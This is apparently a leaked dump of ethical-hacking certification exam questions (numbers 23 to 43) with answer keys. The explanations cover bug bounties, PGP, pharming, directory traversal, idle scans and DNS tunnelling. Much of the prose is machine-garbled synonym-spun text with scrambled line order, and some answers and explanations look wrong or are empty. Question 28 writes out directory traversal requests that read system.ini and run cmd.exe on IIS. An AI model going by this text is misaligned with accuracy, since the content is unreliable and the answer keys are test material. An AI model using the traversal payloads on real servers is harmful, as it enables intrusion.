PHI stands for Protected Health info. The HIPAA Privacy Rule provides federal protections for private health
info held by lined entities and provides patients identifiable health info that's used, maintained, stored, or
transmitted by a
an array of rights with regard to that info. under HIPAA phi is considered to be any
a healthcare provider, health plan or health insurer, or a aid clearinghouse or a business associate of a
HIPAA-covered entity, in HIPAA-covered entity
relation to the availability of aid or payment for aid services.
that's considered letter under HIPAA Rules, however also future info concerning medical conditions or physical
It is not only past and current medical info
and mental health related to the provision of care or payment for care. phi is health info in any kind, together
with physical records, electronic records, or spoken info.
Therefore, letter includes health records, medical histories, lab check results, and medical bills. basically, all
health info is considered letter once it includes individual identifiers. Demographic info is additionally thought of
phi underneath HIPAA Rules, as square measure several common identifiers like patient Security numbers,
Driver's license numbers, insurance details, and birth dates, once they square measure connected with health
info.
names, Social
The eighteen identifiers that create health info letter are:
Names
Dates, except year phonephone numbers Geographic informationFAX numbers
Social Security numbersEmail addresses
case history numbersAccount numbers
Health arrange beneficiary numbersCertificate/license numbers
Vehicle identifiers and serial numbers together with license platesWeb URLs
Device identifiers and serial numbersnet protocol addresses
Full face photos and comparable pictures Biometric identifiers (i.e. retinal scan, fingerprints)Any distinctive
identifying variety or code One or a lot of of those identifiers turns health info into letter, and phi HIPAA Privacy
Rule restrictions can then apply that limit uses and disclosures of the data. HIPAA lined entities and their
business associates will ought to guarantee applicable technical, physical, and body safeguards are enforced to
make sure the confidentiality, integrity, and availability of phi as stipulated within the HIPAA
Security Rule.
QUESTION 23
What is the common name for a vulnerability disclosure program opened by companies In platforms such as
HackerOne?
A. Vulnerability hunting program

B. Bug bounty program
C. White-hat hacking program
D. Ethical hacking program
Correct Answer: B
Section: (none)
Explanation
Explanation:
Bug bounty programs allow independent security researchers to report bugs to an companies and receive
rewards or compensation. These bugs area unit sometimes security exploits and vulnerabilities, although they
will additionally embody method problems, hardware flaws, and so on. The reports area unit usually created
through a program travel by associate degree freelance third party (like Bugcrowd or HackerOne). The
companies can organization's wants.
got wind of (and run) a program curated to the
Programs is also non-public (invite-only) wherever reports area unit unbroken confidential to the organization or
public (where anyone will sign in and join). they will happen over a collection timeframe or with without stopping
date (though the second possibility is a lot of common).
Who uses bug bounty programs?
Many major organizations use bug bounties as an area of their security program, together with AOL, Android,
Apple, Digital Ocean, and goldman Sachs. you'll read an inventory of all the programs offered by major bug
bounty suppliers, Bugcrowd and HackerOne, at these links.
Why do corporations use bug bounty programs?
Bug bounty programs provide corporations the flexibility to harness an outsized cluster of hackers so as to seek
out bugs in their code.
testers than they'd be able to access on a one-on-one basis. It {can also|also will|can even|may
This gives them access to a bigger variety of hackers or
also|may} increase the probabilities that bugs area unit found and reported to them before malicious hackers
can exploit them. It may also be an honest publicity alternative for a firm. As bug bounties became a lot of
common, having a bug bounty program will signal to the general public and even regulators that a corporation
incorporates a mature security program. This trend is likely to continue, as some have began to see bug bounty
programs as an business normal that all companies ought to invest in.
Why do researchers and hackers participate in bug bounty programs?
Finding and news bugs via a bug bounty program may end up in each money bonuses and recognition. In
some cases, it will be a good thanks to show real- world expertise once you are looking for employment, or will
even facilitate introduce you to parents on the protection team within an companies. This can be full time
income for a few of us, income to supplement employment, or the way to point out off your skills and find a full
time job. It may also be fun! it is a nice (legal) probability to check out your skills against huge companies and
government agencies.
What area unit the disadvantages of a bug bounty program for independent researchers and hackers?
A lot of hackers participate in these varieties of programs, and it will be tough to form a major quantity of cash
on the platform. In order to say the reward, the hacker has to be the primary person to submit the bug to the
program. meaning that in apply, you may pay weeks searching haven't sold-out a
for a bug to use, solely to be the person to report it and build no cash. Roughly ninety seven of participants on
major bug bounty platforms bug.
In fact, a 2019 report from HackerOne confirmed that out of quite three hundred,000 registered users, solely
around two.5% received a bounty in their time on the platform.
Essentially, most hackers are not creating a lot of cash on these platforms, and really few square measure
creating enough to switch a full time wage (plus they do not have advantages like vacation days, insurance, and
retirement planning).
What square measure the disadvantages of bug bounty programs for organizations?
they weren't able to find themselves (and if
These programs square measure solely helpful if the program ends up in the companies realizeing issues that
they'll fix those problems)! If the companies is not mature enough to be able to quickly rectify known problems,
a bug bounty program is not the right alternative for his or her companies.
Also, any bug bounty program is probably going to draw in an outsized range of submissions, several of which
can not be high-quality submissions. a it's
corporation must be ready to cope with the exaggerated volume of alerts, and also the risk of a coffee signal to
noise magnitude relation (essentially that they're going to receive quite few unhelpful reports for each useful
report).
probably that
Additionally, if the program does not attract enough participants (or participants with the incorrect talent set, and
so participants are not able to establish any bugs), the program is not useful for the companies. The
overwhelming majority of bug bounty participants consider web site vulnerabilities (72%, per HackerOn),
whereas solely a number of (3.5%) value more highly to seek for package vulnerabilities.
This is probably because of the actual fact that hacking in operation systems (like network hardware and
memory) needs a big quantity of extremely specialised experience. this implies that firms may even see vital
come on investment for bug bounties on websites, and not for alternative applications, notably those that need
specialised experience.
This conjointly implies that organizations which require to look at AN application or web site among a selected
time-frame may not need to rely on a bug bounty as there is no guarantee of once or if they receive reports.
Finally, it are often probably risky to permit freelance researchers to try to penetrate your network. this could
end in public speech act of bugs, inflicting organizations' product or service), or speech act of bugs to
name harm within the limelight (which could end in individuals not eager to purchase the
additional malicious third parties, United Nations agency may use this data to focus on the organization.
QUESTION 24
Which file is a rich target to discover the structure of a website during web-server footprinting?
A. Document root
B. Robots.txt
C. domain.txt
D. index.html
Correct Answer: B
Section: (none)
Explanation
Explanation:
QUESTION 25
John wants to send Marie an email that includes sensitive information, and he does not trust the network that
he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly
using this type of encryption?
A. Use his own public key to encrypt the message.

B. Use Marie's public key to encrypt the message.
C. Use his own private key to encrypt the message.
D. Use Marie's private key to encrypt the message.
Correct Answer: B
Section: (none)
Explanation
Explanation:
When a user encrypts plaintext with PGP, PGP first compresses the plaintext. The session key works with a
very secure, fast conventional encryption algorithm to encrypt the plaintext; the result is ciphertext. Once the
data is encrypted, the session key is then encrypted to the recipient's public key https://en.wikipedia.org/wiki/
Pretty_Good_Privacy Pretty Good Privacy (PGP) is an encryption program that provides cryptographic privacy
and authentication for data communication. PGP is used for signing, encrypting, and decrypting texts, emails,
files, directories, and whole disk partitions and to increase the security of e-mail communications.
PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and
finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound
to a username or an e-mail address.
https://en.wikipedia.org/wiki/Public-key_cryptography
Public key encryption uses two different keys. One key is used to encrypt the information and the other is used
to decrypt the information. Sometimes this is referred to as asymmetric encryption because two keys are
required to make the system and/or process work securely. One key is known as the public key and should be
shared by the owner with anyone who will be securely communicating with the key owner. However, the owner's
secret key is not to be shared and considered a private key. If the private key is shared with unauthorized
recipients, the encryption mechanisms protecting the information must be considered compromised.
QUESTION 26
Attacker Steve targeted an organization's network with the aim of redirecting the company's web traffic to
another malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the
vulnerabilities In the DNS server software and modified the original IP address of the target website to that of a
fake website. What is the technique employed by Steve to gather information for identity theft?
A. Pretexting
B. Pharming
C. Wardriving
D. Skimming
Correct Answer: B
Section: (none)
Explanation
Explanation:
site's traffic to a faux website controlled by the offender, typically for the aim of collection sensitive data from
A pharming attacker tries to send a web
victims or putting in malware on their machines. Attacker tend to specialize in making look-alike ecommerce
and digital banking websites to reap credentials and payment card data.
"Pharming attacker are targeted on manipulating a system, instead of
Though they share similar goals, pharming uses a special technique from phishing.
site," explains David Emm, principal security man of science at Kaspersky. "When either a phishing or
tricking people into reaching to a dangerous web
pharming attacker is completed by a criminal, they need a similar driving issue to induce victims onto a corrupt
location, however the mechanisms during undertaken are completely different."
which this is often
QUESTION 27
Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems
by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts
information such as sender identities, mall servers, sender IP addresses, and sender locations from different
public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of
the following tools is used by Wilson in the above scenario?
A. Factiva
B. Netcraft
C. infoga
D. Zoominfo
Correct Answer: C
Section: (none)
Explanation
Explanation:
(ip,hostname,country,...) from completely different public supply (search engines, pgp key
Infoga may be a tool gathering email accounts informations
servers and shodan) and check if email was leaked using haveibeenpwned.com API. is a really simple tool,
however very effective for the first stages of a penetration test or just to know the visibility of your company
within the net.
QUESTION 28
"dot dot slash" (../) character string and instead
While testing a web application in development, you notice that the web server does not properly ignore the
returns the file listing of a folder structure of the server. What kind of attack is possible in this scenario?
A. Cross-site scripting
B. Denial of service
C. SQL injection
D. Directory traversal
Correct Answer: D
Section: (none)
Explanation
Explanation:
Appropriately controlling admittance to web content is significant for running a safe web worker.
catalogsand execute orders outside of the web worker's root
Index crossing or Path Traversal is a HTTP assault which permits aggressors to get to limited
registry. Web workers give two primary degrees of security instruments
Access Control Lists (ACLs)Root index
eb worker's manager uses to show which clients or gatherings can get to,
An Access Control List is utilized in the approval cycle. It is a rundown which the w
change or execute specific records on the worker, just as other access rights. The root registry is a particular
index on the worker record framework in which the clients are kept.
can't get to anything over this root.
Clients
ent, a client doesn't approach C:\Windows yet
For instance: the default root registry of IIS on Windows is C:\Inetpub\wwwroot and with this arrangem
approaches C:\Inetpub\wwwroot\news and some other indexes and documents under the root catalog (given
that the client is confirmed by means of the ACLs).
The root index keeps clients from getting to any documents on the worker, for example, C:\WINDOWS/
system32/win.ini on Windows stages and the/and so on/passwd record on Linux/UNIX stages. This weakness
can exist either in the web worker programming itself or in the web application code. To play out a registry
crossing assault, all an assailant requires is an internet browser and some information on where to aimlessly
discover any default documents and registries on the framework. What an assailant can do if your site is
defenseless
With a framework defenseless against index crossing, an aggressor can utilize this weakness to venture out of
the root catalog and access different pieces of the record framework. This may enable the assailant to see
confined documents, which could give the aggressor more data needed to additional trade off the framework.
"the site". Along
Contingent upon how the site access is set up, the aggressor will execute orders by mimicking himself as the
client which is related with these lines everything relies upon what the site client has been offered admittance to
in the framework.
Illustration of a Directory Traversal assault by means of web application code In web applications with dynamic
pages, input is generally gotten from programs through GET or POST solicitation techniques. Here is an
illustration of a HTTP GET demand URL GET
http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1 Host: test.webarticles.com With this URL,
the browser requests the dynamic page show.asp from the server and with it also sends the parameter view
with the value of oldarchive.html. When this request is executed on the web server, server's file system,
renders it and then sends it back to the browser which displays it to the user. The
show.asp retrieves the file oldarchive.html from the
attacker would assume that show.asp can retrieve files from the file system and sends the following custom
URL.
GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1Host:
test.webarticles.comThis will cause the dynamic page to retrieve the file system.ini from the file system and
display it tothe user. The expression
../ instructs the system to go one directory up which is commonly used as anoperating system directive. The
attacker has to guess how many directories he has to go up to findthe Windows folder on the system, but this is
easily done by trial and error.
Example of a Directory Traversal attack via web server
Apart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The
problem can either be incorporated into the web server software or inside some sample script files left available
on the server. The vulnerability has been fixed in the latest versions of web server software, but there are web
servers online which are still using older versions of IIS and Apache which might be open to directory traversal
attacks. Even though you might be using a web server software version that has fixed this vulnerability, you
might still have some sensitive default script directories exposed which are well known to hackers.
For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute
a command can be GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1
Host: server.com The request would return to the user a list of all files in the C:\ directory by executing the
cmd.exe command shell file and run the command dir c:\ in the shell. The %5c expression that is in the URL
request is a web server escape code which is used to represent normal characters. In this case %5c represents
the character \.
Newer versions of modern web server software check for these escape codes and do not let them through.
Some older versions however, do not filter out these codes in the root directory enforcer and will let the
attackers execute such commands.
QUESTION 29
Henry Is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with
discovering the operating system (OS) of a host. He used the Unkornscan tool to discover the OS of the target
system. As a result, he obtained a TTL value, which Indicates that the target system is running a Windows OS.
Identify the TTL value Henry obtained, which indicates that the target OS is Windows.
A. 64
B. 128
C. 255
D. 138
Correct Answer: B
Section: (none)
Explanation
Explanation:
Windows TTL 128, Linux TTL 64, OpenBSD 255 ... https://subinsb.com/default-device-ttl-values/Time to Live
(TTL) represents to number of 'hops' a packet can take before it is considered invalid. ForWindows/Windows
Phone, this value is
128. This value is 64 for Linux/Android.
QUESTION 30
Ethical backer jane Doe is attempting to crack the password of the head of the it department of ABC company.
She Is utilizing a rainbow table and notices upon entering a password that extra characters are added to the
password after submitting. What countermeasure is the company using to protect against rainbow tables?
A. Password key hashing

B. Password salting
C. Password hashing
D. Account lockout
Correct Answer: B
Section: (none)
Explanation
Explanation:
"hashed and salted". salting is simply the addition of a unique, random string of characters renowned solely to
the site Passwords are usually delineated as
it's hashed, typically this "salt" is placed in front of each password.
to every parole before
The salt value needs to be hold on by the site, which means typically sites use the same salt for each parole.
This makes it less effective than if individual salts are used.
like "123456" or "password" aren't revealed revealed when one such
The use of unique salts means that common passwords shared by multiple users
because despite the passwords being the same the immediately and hashed values are not.
hashed password is known
Large salts also protect against certain methods of attack on hashes, including rainbow tables or logs of
hashed passwords previously broken.Both hashing and salting may be repeated more than once to increase
the issue in breaking the security.
QUESTION 31
which of the following protocols can be used to secure an LDAP service against anonymous queries?
A. SSO
B. RADIUS
C. WPA
D. NTLM
Correct Answer: D
Section: (none)
Explanation
Explanation:
In a Windows network, nongovernmental organization (New Technology) local area network Manager (NTLM)
could be a suite of Microsoft security protocols supposed to produce authentication, integrity, and confidentiality
to users.NTLM is that the successor to the authentication protocol in Microsoft local area network Manager
(LANMAN), Associate in Nursing older Microsoft product. The NTLM protocol suite is enforced in an
exceedingly Security Support supplier, which mixes the local area network Manager authentication protocol,
NTLMv1, NTLMv2 and NTLM2 Session protocols in an exceedingly single package. whether or not these
protocols area unit used or will be used on a system is ruled by cluster Policy settings, that totally different|
completely different} versions of Windows have different default settings. NTLM passwords area unit thought-
about weak as a result of they will be brute-forced very simply with fashionable hardware.
NTLM could be a challenge-response authentication protocol that uses 3 messages to authenticate a consumer
in an exceedingly affiliation orientating setting (connectionless is similar), and a fourth extra message if integrity
is desired. First, the consumer establishes a network path to the server and sends a NEGOTIATE_MESSAGE
advertising its capabilities.
Next, the server responds with CHALLENGE_MESSAGE that is employed to determine the identity of the
consumer.Finally, the consumer responds to the challenge with Associate in Nursing
AUTHENTICATE_MESSAGE.
The NTLM protocol uses one or each of 2 hashed word values, each of that are keep on the server (or domain
controller), and that through a scarcity of you'll evidence while not knowing the particular word. the 2
seasoning area unit word equivalent, that means that if you grab the hash price from the server,
area unit the lm Hash (a DES-based operate applied to the primary fourteen chars of the word born-again to the
standard eight bit laptop charset for the language), and also the nt Hash (MD4 of the insufficient endian UTF-16
Unicode password). each hash values area unit sixteen bytes (128 bits) every.
The NTLM protocol additionally uses one among 2 a method functions, looking on the NTLM version.
National Trust LanMan and NTLM version one use the DES primarily based LanMan a method operate
(LMOWF), whereas National TrustLMv2 uses the NT MD4 primarily based a method operate (NTOWF).
QUESTION 32
Allen, a professional pen tester, was hired by xpertTech solutWns to perform an attack simulation on the
organization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted
the NetBIOS service. B/ enumerating NetBIOS, he found that port 139 was open and could see the resources
that could be accessed or viewed on a remote system. He came across many NetBIOS codes during
enumeration. identify the NetBIOS code used for obtaining the messenger service running for the logged-in
user?
A. <1B>
B. <00>
C. <03>
D. <20>
Correct Answer: C
Section: (none)
Explanation
Explanation:
<03>
Windows Messenger administration
Courier administration is an organization based framework notice Windows administration by Microsoft that was
remembered for some prior forms of Microsoft Windows.
isn't connected in any capacity to the later, Internet-based Microsoft Messenger
This resigned innovation, despite the fact that it has a comparable name,
administration for texting or to Windows Messenger and Windows Live Messenger (earlier named MSN
Messenger) customer programming. The Messenger Service was initially intended for use by framework
managers to tell Windows clients about their networks.[1] It has been utilized malevolently to introduce spring
up commercials to clients over the Internet (by utilizing mass- informing frameworks which sent an ideal
message to a isn't empowered naturally. Along these lines, numerous
predetermined scope of IP addresses). Despite the fact that Windows XP incorporates a firewall, it
clients got such messages. Because of this maltreatment, the Messenger Service has been debilitated as a
matter of course in Windows XP Service Pack 2.
QUESTION 33
what firewall evasion scanning technique make use of a zombie system that has low network activity as well as
its fragment identification numbers?
A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning
Correct Answer: D
Section: (none)
Explanation
Explanation:
The idle scan could be a communications protocol port scan technique that consists of causing spoofed
packets to a pc to seek out out what services square measure obtainable. this can be accomplished by
impersonating another pc whose network traffic is extremely slow or nonexistent (that is, not transmission a
"zombie".
or receiving information). this might be associate idle pc, known as
This action are often done through common code network utilities like nmap and hping. The attack involves
causing solid packets to a particular machine there's no interaction between the
target in an attempt to seek out distinct characteristics of another zombie machine. The attack is refined as a
result of "zombie" pc.
offender pc and also the target: the offender interacts solely with the
This exploit functions with 2 functions, as a port scanner and a clerk of sure informatics relationships between
machines. The target system interacts with "zombie" pc and distinction in behavior are often discovered
mistreatment totally different|completely different "zombies" with proof of various privileges the
granted by the target to different computers.
"check the port standing whereas remaining utterly invisible to the targeted host." The first step in execution
The overall intention behind the idle scan is to
associate idle scan is to seek out associate applicable zombie. It must assign informatics ID packets
incrementally on a worldwide (rather than per-host it communicates with) basis. It ought to be idle (hence the
scan name), as extraneous traffic can raise its informatics ID sequence, confusing the scan logic. The lower the
latency between the offender and also the zombie, and between the zombie and also the target, the quicker the
scan can proceed. Note that once a port is open, IPIDs increment by a pair of. Following is that the sequence:
offender to focus on -> SYN, target to zombie ->SYN/ACK, Zombie to focus on -> RST (IPID increment by 1)
currently offender tries to probe zombie for result. offender to Zombie ->SYN/ACK, Zombie to offender -> RST
(IPID increment by 1) So, during this method IPID increments by a pair of finally.
When associate idle scan is tried, tools (for example nmap) tests the projected zombie and reports any issues
with it. If one does not work, attempt another. Enough net hosts square measure vulnerable that zombie
candidates are not exhausting to seek out. a standard approach is to easily execute a ping sweep o your supply
address, or close to the target, produces higher results. you'll be able to attempt associate idle
of some network. selecting a network close t
it's best to raise permission before
scan mistreatment every obtainable host from the ping sweep results till you discover one that works. As usual,
someone's machines for surprising functions like idle scanning.
mistreatment
square measure|they're} normally each underused (idle) and designed with
Simple network devices typically create nice zombies as a result of {they
straightforward network stacks that are susceptible to informatics ID traffic detection. While distinguishing an
acceptable zombie takes some initial work, you'll be able to keep re-using the nice ones. as an alternative,
there are some analysis on utilizing unplanned public internet services as zombie hosts to perform similar idle
scans. leverage the approach a number of these services perform departing connections upon user
submissions will function some quite poor's man idle scanning.
QUESTION 34
What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an
organization?
A. The attacker queries a nameserver using the DNS resolver.

B. The attacker makes a request to the DNS resolver.
C. The attacker forges a reply from the DNS resolver.
D. The attacker uses TCP to poison the ONS resofver.
Correct Answer: B
Section: (none)
Explanation
Explanation:
https://ru.wikipedia.org/wiki/DNS_spoofing
DNS spoofing is a threat that copies the legitimate server destinations to divert the domain's traffic.
Ignorant these attacks, the users are redirected to malicious websites, which results in insensitive and personal
data being leaked. It is a method of attack where your DNS server is tricked into saving a fake DNS entry. This
will make the DNS server recall a fake site for you, thereby posing a threat to vital information stored on your
server or computer.
The cache poisoning codes are often found in URLs sent through spam emails. These emails are sent to
prompt users to click on the URL, which infects their computer. When the computer is poisoned, it will divert
you to a fake IP address that looks like a real thing. This way, the threats are injected into your systems as well.
Different Stages of Attack of DNS Cache Poisoning:
- The attacker proceeds to send DNS queries to the DNS resolver, which forwards the Root/TLD authoritative
DNS server request and awaits an answer.
- The attacker overloads the DNS with poisoned responses that contain several IP addresses of the malicious
website. To be accepted by the DNS resolver, the attacker's response should match a port number and the
query ID field before the DNS response. Also, the attackers can force its response to increasing their chance of
success.
- If you are a legitimate user who queries this DNS resolver, you will get a poisoned response from the cache,
and you will be automatically redirected to the malicious website.
QUESTION 35
in an attempt to increase the security of your network, you Implement a solution that will help keep your wireless
network undiscoverable and accessible only to those that know It. How do you accomplish this?
A. Delete the wireless network

B. Remove all passwords
C. Lock all users
D. Disable SSID broadcasting
Correct Answer: D
Section: (none)
Explanation
Explanation:
The SSID (service set identifier) is the name of your wireless network. SSID broadcast is how your router
transmits this name to surrounding devices. Its primary function is to make your network visible and easily
accessible. Most routers broadcast their SSIDs automatically. To disable or enable SSID change your router's
settings.
broadcast, you need to
Disabling SSID broadcast will make your Wi-FI network name invisible to other users. However, this only hides
the name, not the network itself. You cannot disguise the router's activity, so hackers can still attack it.
With your network invisible to wireless devices, connecting becomes a bit more complicated. Just giving a Wi-
FI password to your guests is no longer enough. They have to configure their settings manually by including the
network name, security mode, and other relevant info. Disabling SSID might be a small step towards online
security, but by no means should it be your final one. Before considering it as a security measure, consider the
following aspects:
- Disabling SSID broadcast will not hide your network completely
Disabling SSID broadcast only hides the network name, not the fact that it exists. Your router constantly
transmits so-called beacon frames to announce the presence of a wireless network. They contain essential
information about the network and help the device connect.
- Third-party software can easily trace a hidden network
Programs such as NetStumbler or Kismet can easily locate hidden networks. You can try using them yourself to
see how easy it is to find available networks hidden or not.
- You might attract unwanted attention.
Disabling your SSID broadcast could also raise suspicion. Most of us assume that when somebody hides
something, they have a reason to do so. Thus, some hackers might be attracted to your network.
QUESTION 36
what is the port to block first in case you are suspicious that an loT device has been compromised?
A. 22
B. 443
C. 48101
D. 80
Correct Answer: C
Section: (none)
Explanation
Explanation:
TCP port 48101 uses the Transmission management Protocol. transmission control protocol is one in all the
most protocols in TCP/IP networks. transmission control protocol could be a connectionoriented protocol, it
needs acknowledgement to line up end-to-end communications. only a association is up user's knowledge may
be sent bi-directionally over the association.
about
Attention! transmission control protocol guarantees delivery of knowledge packets on port 48101 within the
same order during which they were sent. bonded communication over transmission control protocol port 48101
is that the main distinction between transmission control protocol and UDP. UDP port 48101 wouldn't have
bonded communication as transmission control protocol.
UDP on port 48101 provides Associate in Nursing unreliable service and datagrams might arrive duplicated, out
of order, or missing unexpectedly. UDP on and correction isn't necessary or performed within the application,
avoiding the overhead of such process at the
port 48101 thinks that error checking
network interface level.
UDP (User Datagram Protocol) could be a borderline message-oriented Transport Layer protocol (protocol is
documented in IETF RFC 768). Application examples that always use UDP: vocalisation IP (VoIP), streaming
media and period multiplayer games. several internet applications use UDP, e.g. the name System (DNS), the
Routing info Protocol (RIP), the Dynamic Host Configuration Protocol (DHCP), the straightforward Network
Management Protocol (SNMP).
QUESTION 37
Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in
order to exfiltrate dat a. He is using the NSTX tool for bypassing the firewalls. On which of the following ports
should Robin run the NSTX tool?
A. Port 53
B. Port 23
C. Port 50
D. Port 80
Correct Answer: A
Section: (none)
Explanation
Explanation:
DNS uses Ports 53 which is almost always open on systems, firewalls, and clients to transmit DNS queries.
instead of the more familiar Transmission Control Protocol (TCP) these queries use User Datagram Protocol
(UDP) due to its low- latency, bandwidth and resource usage compared TCPequivalent queries. UDP has no
error or flow-control capabilities, nor does it have any integrity checking to make sure the info arrived intact.
(it's a besteffort protocol after all) within the first instance, most
How is internet use (browsing, apps, chat etc) so reliable then? If the UDP DNS query fails
systems will retry variety of times and only after multiple failures, potentially switch to TCP before trying again;
TCP is additionally used if the DNS query typically 512 bytes for DNS but can depend upon system settings.
exceeds the restrictions of the UDP datagram size
Figure 1 below illustrates the essential process of how DNS operates: the client sends a question string (for
example, mail.google[.]com during this case) typically A for a number address. I've skipped the part whereby
intermediate DNS systems may need to establish where `.com' with a particular type
where `google[.]com' are often found, and so on.
exists, before checking out
it's really no surprise that telnet is usually seen on
Many worms and scanners are created to seek out and exploit systems running telnet. Given these facts,
the highest Ten Target Ports list. Several of the vulnerabilities of telnet are fixed. They require only an upgrade
to the foremost current version of the telnet Daemon or OS upgrade. As is usually the case, this upgrade has
not been performed on variety of devices. this might flow from to the very fact that a lot of don't fully understand
the risks involved using telnet. Unfortunately, the sole solution for a few of telnets vulnerabilities is systems
administrators and users
to completely discontinue its use. the well-liked method of mitigating all of telnets vulnerabilities is replacing it
with alternate protocols like ssh. Ssh is capable of providing many of an equivalent functions as telnet and a
number of other additional services typical handled by other protocols like FTP and it's typically only supported
on newer equipment. It
Xwindows. Ssh does still have several drawbacks to beat before it can completely replace telnet.
requires processor and memory resources to perform the info encryption and decryption. It also requires
greater bandwidth than telnet thanks to the encryption of the info . This paper was written to assist clarify how
dangerous the utilization of telnet are often and to supply solutions to alleviate the main known threats so as to
enhance the general security of the web Once a reputation is resolved to an IP caching also helps: the resolved
name-to-IP is usually cached on the local system (and possibly on intermediate DNS servers) for a period of
your time .
don't leave the local system until said cache expires. Of course, once the IP
Subsequent queries for an equivalent name from an equivalent client then
address of the remote service is understood , applications can use that information to enable other TCP-based
protocols, like HTTP, to try to to their actual work, for instance ensuring internet cat GIFs are often reliably
shared together with your colleagues.
organization's network would be fairly inconspicuous and will leave a malicious payload to
So, beat all, a couple of dozen extra UDP DNS queries from an
beacon bent an adversary; commands could even be received to the requesting
application for processing with little difficulty.
QUESTION 38
Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on
the network lo identify the active systems, network services, applications, and vulnerabilities. He also obtained
the list of the users who are currently accessing the network. What is the type of vulnerability assessment that
Morris performed on the target organization?
A. internal assessment
B. Passive assessment
C. External assessment
D. Credentialed assessment
Correct Answer: B
Section: (none)
Explanation
Explanation:
Passive Assessment Passive assessments sniff the traffic present on the network to identify the active
systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the
users who are currently accessing the network.
QUESTION 39
Bob, an attacker, has managed to access a target loT device. He employed an online tool to gather information
related to the model of the loT device and the certifications granted to it. Which of the following tools did Bob
employ to gather the above Information?
A. search.com
B. EarthExplorer
C. Google image search
D. FCC ID search
Correct Answer: D
Section: (none)
Explanation
Explanation:
Footprinting techniques are used to collect basic information about the target IoT and OT platforms to exploit
them. Information collected through footprinting techniques ncludes IP address, hostname, ISP, device
location, banner of the target IoT device, FCC ID information, certification granted to the device, etc. pg. 5052
ECHv11 manual https://en.wikipedia.org/wiki/FCC_mark An FCC ID is a unique identifier assigned to a device
registered with the United States Federal Communications Commission. For legal sale of wireless deices in the
US, manufacturers must:
· Have the device evaluated by an independent lab to ensure it conforms to FCC standards · Provide
documentation to the FCC of the lab results · Provide User Manuals, Documentation, and Photos relating to the
device · Digitally or physically label the device with the unique identifier provided by the FCC (upon approved
application) The FCC gets its authourity from Title 47 of the Code of Federal Regulations (47 CFR). FCC IDs
are required for all wireless emitting devices sold in the USA. By searching an FCC ID, you can find details on
the wireless operating frequency (including strength), photos of the device, user manuals for the device, and
SAR reports on the wireless emissions
QUESTION 40
Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web
server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a
countermeasures to secure the accounts on the web server.
Which of the following countermeasures must Larry implement to secure the user accounts on the web server?
A. Enable unused default user accounts created during the installation of an OS
B. Enable all non-interactive accounts that should exist but do not require interactive login
C. Limit the administrator or toot-level access to the minimum number of users
D. Retain all unused modules and application extensions
Correct Answer: C
Section: (none)
Explanation
Explanation:
QUESTION 41
Bella, a security professional working at an it firm, finds that a security breach has occurred while transferring
important files. Sensitive data, employee usernames. and passwords are shared In plaintext, paving the way for
hackers 10 perform successful session hijacking. To address this situation. Bella Implemented a protocol that
sends data using encryption and digital certificates.
Which of the following protocols Is used by Bella?
A. FTP
B. HTTPS
C. FTPS
D. IP
Correct Answer: C
Section: (none)
Explanation
Explanation:
The File Transfer Protocol (FTP) is a standard organization convention utilized for the exchange of PC records
from a worker to a customer on a PC organization. FTP is based on a customer worker model engineering
utilizing separate control and information associations between the customer and the server.[1] FTP clients may
validate themselves with an unmistakable book sign-in convention, ordinarily as a username and secret key,
however can interface namelessly if the worker is designed to permit it. For secure transmission that ensures
the username and secret phrase, and scrambles the substance, FTP is frequently made sure about with SSL/
TLS (FTPS) or supplanted with SSH File Transfer Protocol (SFTP).
The primary FTP customer applications were order line programs created prior to working frameworks had
graphical UIs, are as yet dispatched with most Windows, Unix, and Linux working systems.[2][3] Many FTP
customers and mechanization utilities have since been created for working areas, workers, cell phones, and
equipment, and FTP has been fused into profitability applications, for example, HTML editors.
QUESTION 42
Abel, a cloud architect, uses container technology to deploy applications/software including all its
dependencies, such as libraries and configuration files, binaries, and other resources that run independently
from other processes in the cloud environment. For the containerization of applications, he follows the five-tier
container technology architecture. Currently. Abel is verifying and validating image contents, signing images,
and sending them to the registries.
Which of the following tiers of the container technology architecture Is Abel currently working in?
A. Tier-1: Developer machines

B. Tier-4: Orchestrators
C. Tier-3: Registries
D. Tier-2: Testing and accreditation systems
Correct Answer: D
Section: (none)
Explanation
Explanation:
The official management decision given by a senior agency official to authorize operation of an information
system and to explicitly accept the risk to agency operations (including mission, functions, image, or
reputation), agency assets, or individuals, based on the implementation of an agreed-upon set of security
controls. formal declaration by a designated accrediting authority (DAA) or principal accrediting authority (PAA)
that an information system is approved to operate at an acceptable level of risk, based on the implementation
of an approved set of technical, managerial, and procedural safeguards. See authorization to operate (ATO).
Rationale: The Risk Management Framework uses a new term to refer to this concept, and it is called
authorization. Identifies the information resources covered by an accreditation decision, as distinguished from
separately accredited information resources that are interconnected or with which information is exchanged via
messaging. Synonymous with Security Perimeter.
For the purposes of identifying the Protection Level for confidentiality of a system to be accredited, the system
has a conceptual boundary that extends to all intended users of the system, both directly and indirectly
connected, who receive output from the system. See authorization boundary. Rationale: The Risk Management
Framework uses a new term to refer to the concept of accreditation, and it is called authorization. Extrapolating,
the accreditation boundary would then be referred to as the authorization boundary.
QUESTION 43
which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device
through Bluetooth?
A. Bluesmacking
B. Bluebugging
C. Bluejacking
D. Bluesnarfing
Correct Answer: D
Section: (none)
Explanation
Explanation:
